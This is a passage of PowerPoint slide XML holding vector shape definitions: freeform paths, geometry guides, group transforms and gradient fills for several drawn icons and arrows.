                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 38 w 77"/>
                      <a:gd name="T1" fmla="*/ 47 h 108"/>
                      <a:gd name="T2" fmla="*/ 62 w 77"/>
                      <a:gd name="T3" fmla="*/ 23 h 108"/>
                      <a:gd name="T4" fmla="*/ 38 w 77"/>
                      <a:gd name="T5" fmla="*/ 0 h 108"/>
                      <a:gd name="T6" fmla="*/ 14 w 77"/>
                      <a:gd name="T7" fmla="*/ 23 h 108"/>
                      <a:gd name="T8" fmla="*/ 38 w 77"/>
                      <a:gd name="T9" fmla="*/ 47 h 108"/>
                      <a:gd name="T10" fmla="*/ 77 w 77"/>
                      <a:gd name="T11" fmla="*/ 61 h 108"/>
                      <a:gd name="T12" fmla="*/ 71 w 77"/>
                      <a:gd name="T13" fmla="*/ 54 h 108"/>
                      <a:gd name="T14" fmla="*/ 5 w 77"/>
                      <a:gd name="T15" fmla="*/ 54 h 108"/>
                      <a:gd name="T16" fmla="*/ 0 w 77"/>
                      <a:gd name="T17" fmla="*/ 61 h 108"/>
                      <a:gd name="T18" fmla="*/ 0 w 77"/>
                      <a:gd name="T19" fmla="*/ 101 h 108"/>
                      <a:gd name="T20" fmla="*/ 5 w 77"/>
                      <a:gd name="T21" fmla="*/ 108 h 108"/>
                      <a:gd name="T22" fmla="*/ 71 w 77"/>
                      <a:gd name="T23" fmla="*/ 108 h 108"/>
                      <a:gd name="T24" fmla="*/ 77 w 77"/>
                      <a:gd name="T25" fmla="*/ 101 h 108"/>
                      <a:gd name="T26" fmla="*/ 77 w 77"/>
                      <a:gd name="T27" fmla="*/ 6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77" h="108">
                        <a:moveTo>
                          <a:pt x="38" y="47"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="51" y="47"/>
                          <a:pt x="62" y="36"/>
                          <a:pt x="62" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="10"/>
                          <a:pt x="51" y="0"/>
                          <a:pt x="38" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="25" y="0"/>
                          <a:pt x="14" y="10"/>
                          <a:pt x="14" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="36"/>
                          <a:pt x="25" y="47"/>
                          <a:pt x="38" y="47"/>
                        </a:cubicBezTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="77" y="61"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="57"/>
                          <a:pt x="74" y="54"/>
                          <a:pt x="71" y="54"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5" y="54"/>
                          <a:pt x="5" y="54"/>
                          <a:pt x="5" y="54"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="54"/>
                          <a:pt x="0" y="57"/>
                          <a:pt x="0" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="107"/>
                          <a:pt x="0" y="101"/>
                          <a:pt x="0" y="101"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="105"/>
                          <a:pt x="2" y="108"/>
                          <a:pt x="5" y="108"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="71" y="108"/>
                          <a:pt x="71" y="108"/>
                          <a:pt x="71" y="108"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="108"/>
                          <a:pt x="77" y="105"/>
                          <a:pt x="77" y="101"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="77" y="6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229" name="Group 454"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4576235" y="1977533"/>
              <a:ext cx="465583" cy="140176"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="230" name="Freeform 455"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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31" name="Freeform 456"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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32" name="Freeform 457"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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33" name="Freeform 458"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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34" name="Freeform 459"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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35" name="Group 460"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5771482" y="1955004"/>
              <a:ext cx="498124" cy="148936"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="236" name="Freeform 461"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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37" name="Freeform 462"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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38" name="Freeform 463"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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39" name="Freeform 464"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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40" name="Group 903"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3354705" y="1435603"/>
              <a:ext cx="1612019" cy="978726"/>
              <a:chOff x="205" y="1782"/>
              <a:chExt cx="1288" cy="782"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="241" name="Freeform 466"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="205" y="2219"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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42" name="Group 467"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="799" y="2094"/>
                <a:ext cx="149" cy="232"/>
                <a:chOff x="4580" y="2752"/>
                <a:chExt cx="608" cy="950"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="337" name="Freeform 468"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4628" y="3358"/>
                  <a:ext cx="355" cy="344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 240"/>
                    <a:gd name="T1" fmla="*/ 0 h 233"/>
                    <a:gd name="T2" fmla="*/ 0 w 240"/>
                    <a:gd name="T3" fmla="*/ 200 h 233"/>
                    <a:gd name="T4" fmla="*/ 120 w 240"/>
                    <a:gd name="T5" fmla="*/ 233 h 233"/>
                    <a:gd name="T6" fmla="*/ 240 w 240"/>
                    <a:gd name="T7" fmla="*/ 200 h 233"/>
                    <a:gd name="T8" fmla="*/ 240 w 240"/>
                    <a:gd name="T9" fmla="*/ 0 h 233"/>
                    <a:gd name="T10" fmla="*/ 0 w 240"/>
                    <a:gd name="T11" fmla="*/ 0 h 2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0" h="233">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="200"/>
                        <a:pt x="0" y="200"/>
                        <a:pt x="0" y="200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="218"/>
                        <a:pt x="54" y="233"/>
                        <a:pt x="120" y="233"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="187" y="233"/>
                        <a:pt x="240" y="218"/>
                        <a:pt x="240" y="200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="0"/>
                        <a:pt x="240" y="0"/>
                        <a:pt x="24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38" name="Oval 469"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4628" y="3310"/>
                  <a:ext cx="355" cy="97"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
                <a:ln w="6350" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="C0C0C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Freeform 470"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4815" y="3164"/>
                  <a:ext cx="185" cy="228"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 74 w 125"/>
                    <a:gd name="T1" fmla="*/ 5 h 154"/>
                    <a:gd name="T2" fmla="*/ 74 w 125"/>
                    <a:gd name="T3" fmla="*/ 5 h 154"/>
                    <a:gd name="T4" fmla="*/ 74 w 125"/>
                    <a:gd name="T5" fmla="*/ 5 h 154"/>
                    <a:gd name="T6" fmla="*/ 62 w 125"/>
                    <a:gd name="T7" fmla="*/ 8 h 154"/>
                    <a:gd name="T8" fmla="*/ 62 w 125"/>
                    <a:gd name="T9" fmla="*/ 8 h 154"/>
                    <a:gd name="T10" fmla="*/ 9 w 125"/>
                    <a:gd name="T11" fmla="*/ 22 h 154"/>
                    <a:gd name="T12" fmla="*/ 0 w 125"/>
                    <a:gd name="T13" fmla="*/ 154 h 154"/>
                    <a:gd name="T14" fmla="*/ 64 w 125"/>
                    <a:gd name="T15" fmla="*/ 137 h 154"/>
                    <a:gd name="T16" fmla="*/ 125 w 125"/>
                    <a:gd name="T17" fmla="*/ 62 h 154"/>
                    <a:gd name="T18" fmla="*/ 74 w 125"/>
                    <a:gd name="T19" fmla="*/ 5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25" h="154">
                      <a:moveTo>
                        <a:pt x="74" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="5"/>
                        <a:pt x="74" y="5"/>
                        <a:pt x="74" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="5"/>
                        <a:pt x="74" y="5"/>
                        <a:pt x="74" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="5"/>
                        <a:pt x="66" y="6"/>
                        <a:pt x="62" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="8"/>
                        <a:pt x="62" y="8"/>
                        <a:pt x="62" y="8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0" y="154"/>
                        <a:pt x="0" y="154"/>
                        <a:pt x="0" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="137"/>
                        <a:pt x="64" y="137"/>
                        <a:pt x="64" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="128"/>
                        <a:pt x="125" y="103"/>
                        <a:pt x="125" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="26"/>
                        <a:pt x="106" y="0"/>
                        <a:pt x="74" y="5"/>
                      </a:cubicBez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0" name="Freeform 471"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4636" y="3180"/>
                  <a:ext cx="270" cy="212"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 121 w 182"/>
                    <a:gd name="T1" fmla="*/ 143 h 143"/>
                    <a:gd name="T2" fmla="*/ 182 w 182"/>
                    <a:gd name="T3" fmla="*/ 69 h 143"/>
                    <a:gd name="T4" fmla="*/ 119 w 182"/>
                    <a:gd name="T5" fmla="*/ 14 h 143"/>
                    <a:gd name="T6" fmla="*/ 0 w 182"/>
                    <a:gd name="T7" fmla="*/ 83 h 143"/>
                    <a:gd name="T8" fmla="*/ 0 w 182"/>
                    <a:gd name="T9" fmla="*/ 110 h 143"/>
                    <a:gd name="T10" fmla="*/ 121 w 182"/>
                    <a:gd name="T11" fmla="*/ 143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2" h="143">
                      <a:moveTo>
                        <a:pt x="121" y="143"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="134"/>
                        <a:pt x="182" y="109"/>
                        <a:pt x="182" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="182" y="28"/>
                        <a:pt x="157" y="0"/>
                        <a:pt x="119" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="28"/>
                        <a:pt x="10" y="80"/>
                        <a:pt x="0" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="110"/>
                        <a:pt x="0" y="110"/>
                        <a:pt x="0" y="110"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="121" y="143"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0061B2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Freeform 472"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4614" y="2828"/>
                  <a:ext cx="319" cy="367"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 150 w 215"/>
                    <a:gd name="T1" fmla="*/ 248 h 249"/>
                    <a:gd name="T2" fmla="*/ 150 w 215"/>
                    <a:gd name="T3" fmla="*/ 249 h 249"/>
                    <a:gd name="T4" fmla="*/ 215 w 215"/>
                    <a:gd name="T5" fmla="*/ 232 h 249"/>
                    <a:gd name="T6" fmla="*/ 90 w 215"/>
                    <a:gd name="T7" fmla="*/ 11 h 249"/>
                    <a:gd name="T8" fmla="*/ 57 w 215"/>
                    <a:gd name="T9" fmla="*/ 3 h 249"/>
                    <a:gd name="T10" fmla="*/ 57 w 215"/>
                    <a:gd name="T11" fmla="*/ 3 h 249"/>
                    <a:gd name="T12" fmla="*/ 0 w 215"/>
                    <a:gd name="T13" fmla="*/ 15 h 249"/>
                    <a:gd name="T14" fmla="*/ 0 w 215"/>
                    <a:gd name="T15" fmla="*/ 15 h 249"/>
                    <a:gd name="T16" fmla="*/ 23 w 215"/>
                    <a:gd name="T17" fmla="*/ 25 h 249"/>
                    <a:gd name="T18" fmla="*/ 150 w 215"/>
                    <a:gd name="T19" fmla="*/ 248 h 2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15" h="249">
                      <a:moveTo>
                        <a:pt x="150" y="248"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="248"/>
                        <a:pt x="150" y="249"/>
                        <a:pt x="150" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="215" y="232"/>
                        <a:pt x="215" y="232"/>
                        <a:pt x="215" y="232"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="11"/>
                        <a:pt x="90" y="11"/>
                        <a:pt x="90" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="1"/>
                        <a:pt x="66" y="0"/>
                        <a:pt x="57" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="3"/>
                        <a:pt x="57" y="3"/>
                        <a:pt x="57" y="3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8" y="15"/>
                        <a:pt x="16" y="17"/>
                        <a:pt x="23" y="25"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="150" y="248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Freeform 473"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4580" y="2835"/>
                  <a:ext cx="321" cy="519"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 217"/>
                    <a:gd name="T1" fmla="*/ 336 h 351"/>
                    <a:gd name="T2" fmla="*/ 197 w 217"/>
                    <a:gd name="T3" fmla="*/ 283 h 351"/>
                    <a:gd name="T4" fmla="*/ 46 w 217"/>
                    <a:gd name="T5" fmla="*/ 20 h 351"/>
                    <a:gd name="T6" fmla="*/ 0 w 217"/>
                    <a:gd name="T7" fmla="*/ 27 h 351"/>
